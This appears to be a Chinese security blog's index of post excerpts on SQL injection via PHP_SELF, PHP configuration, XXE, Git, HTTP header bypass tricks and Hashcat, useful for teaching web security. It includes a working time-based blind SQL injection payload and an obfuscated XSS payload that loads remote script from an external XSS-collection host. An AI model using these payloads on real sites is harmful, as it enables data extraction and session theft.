1、$_SERVER[‘PHP_SELF’]和$_SERVER[‘QUERY_STRING’],而$_SERVER并没有转义,造成了注入。
例如:
/easy/index.php/aaa',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#
Looking at yourself from a different Angle!
1、$_SERVER[‘PHP_SELF’]和$_SERVER[‘QUERY_STRING’],而$_SERVER并没有转义,造成了注入。
例如:
/easy/index.php/aaa',(select/**/if((select/**/ord(substr(user(),1,1)))=114,sleep(3),0)),1)#
PHP核心配置文件:
1.register_globals=Off(全局变量注册开关)
2.allow_url_include=Off(是否允许包含远程文件)与此类似的还有allow_url_fopen
XXE Injection即XML External Entity Injection,也就是XML外部实体注入攻击.
在XML1.0标准⾥里,XML文档结构里定义了实体(entity)这个概念.实体可以通过预定义在文档中调用,实体的标识符可访问本地或远程内容.如果在这个过程中引入了”污染”源,在对XML文档处理后则可能导致信息泄漏等安全问题.
Git 是目前世界上最先进的分布式版本控制系统(没有之一)。
Git有什么特点?简单来说就是:高端大气上档次!
平时访问网站或者做 CTF 题的时候会遇到网站限制访问的问题,下面是一些小技巧,主要是通过 BurpSuite 拦截 HTTP 请求并根据需要修改 HTTP 请求头的内容来达到绕过的目的。
1、http://www.wooyun.org/bugs/wooyun-2013-034003
<textarea/>"><img src=1 onerror="with(document)body.appendChild(createElement(String.fromCharCode(115,99,114,105,112,116))).src='//pxss.sinaapp.com/l6OBji'">
<textarea/><iframe src=http://www.baidu.com/></iframe>
Hashcat是一个已经有贴近完美的工作工具,支持像“PasswordsPro”,“约翰开膛手”基于规则的攻击。然而,对于一些未知的原因,他们两个不支持多线程。这是写Hashcat的唯一理由:为了利用现代CPU的多个核心。